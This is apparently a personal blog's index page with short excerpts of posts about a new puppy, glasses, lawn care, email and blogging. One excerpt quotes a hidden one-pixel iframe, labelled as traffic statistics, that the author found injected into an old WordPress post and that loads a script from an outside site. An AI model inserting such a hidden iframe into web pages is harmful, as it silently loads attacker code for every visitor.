Newest Member of My Family

Say hi to the newest member of our family, Franklin. This little monster is an 8.5 week old teddy bear puppy, which is a Shih-Tzu and Bichon mix. He’s pretty furry. My girlfriend and I picked him up yesterday and he’s already totally comfortable in our house.

I See in HD

I finally got glasses. I can see so much better now. I don’t need to wear them all the time, but when I do it’s like seeing in HD. If you are questioning your eyes like I did for over a year GO get them checked. Go somewhere good though. I went to a local [...]

I’m a Data Junkie

I wish I could collect data on everything around me. I just moved into the new house and I’ve experienced the joys of having a lawn to take care of. Problem is, it wasn’t watered enough during early June and there are some brown areas. I’ve been trying to hit it hard with the sprinkler [...]

Late to the Party Part 6, I discover Del.icio.us

So I know I’m late to the party. Really late. I was cleaning up my desk the other day in preparation to move, and I found this fantastic article about olive oil sitting on my desk. My Dad had given it to me, and I wanted to save it but I didn’t want this thing [...]

How to Get Less Email

I’ve grown tired recently of my phone constantly beeping because I’ve got new email. I’d say about 50% of the time its some newsletter or something I don’t care about. The thing is…the solution is so simple. I’ve started unsubscribing from all the crap. Really, it’s easy. For a week or so, make a point [...]

Nice Exploit Code I Found in my WordPress

I was going through some old posts just now, and discovered this little treat embedded in a post: <!– Traffic Statistics –> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –> The code that it’s loading (I know it doesn’t wrap, I don’t really care.) Code deleted. Thanks to Mike Peters for the follow-up [...]

Lazyweb: Any beginner guides to blogging?

I installed a WordPress for someone the other day, and when they got their first trackback spam it occurred to me that there is more to know about having a blog than installing it. Does anyone know of any beginner guides to read through on how to identify spam comments and trackbacks and other beginner [...]
